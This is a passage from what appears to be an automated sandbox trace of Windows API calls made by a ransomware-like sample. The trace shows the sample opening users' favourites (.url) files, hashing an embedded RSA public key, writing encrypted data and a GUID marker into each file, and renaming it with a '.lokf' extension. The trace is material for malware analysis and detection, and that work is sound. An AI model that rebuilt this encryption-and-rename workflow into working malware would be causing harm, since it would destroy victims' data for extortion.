0x32adb18 [0059.748] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.748] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.lokf")) returned 1 [0059.751] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0059.751] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.751] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201e90 [0059.751] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0059.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.752] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.752] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.755] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.755] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.756] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.756] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.756] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.756] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.757] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.757] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.757] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.757] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.757] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.757] GetLastError () returned 0x0 [0059.757] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.757] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.757] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.757] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.757] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.757] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.757] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.757] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.757] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.757] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.758] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.758] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.758] CloseHandle (hObject=0x5cc) returned 1 [0059.758] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.758] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.758] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.lokf")) returned 1 [0059.760] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0059.760] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.760] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201e90 [0059.760] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0059.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.760] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.760] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.762] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.762] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.763] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.763] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.763] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.763] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.764] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.764] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.764] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.764] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.764] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.764] GetLastError () returned 0x0 [0059.764] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.764] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.764] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.764] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.764] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.765] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.765] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.765] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.765] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.765] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.765] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.765] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.765] CloseHandle (hObject=0x5cc) returned 1 [0059.766] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.766] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.766] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.lokf")) returned 1 [0059.767] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0059.767] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.767] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201e90 [0059.767] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0059.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.768] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.768] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.771] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.771] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.771] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.771] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.772] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.772] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.772] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.772] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.772] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.772] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.772] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.772] GetLastError () returned 0x0 [0059.773] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.773] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.773] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.773] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.773] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.773] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.773] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.773] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.773] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.773] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.773] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.773] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.773] CloseHandle (hObject=0x5cc) returned 1 [0059.774] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.774] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.774] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.lokf")) returned 1 [0059.775] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0059.775] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0059.775] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269928 [0059.776] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) 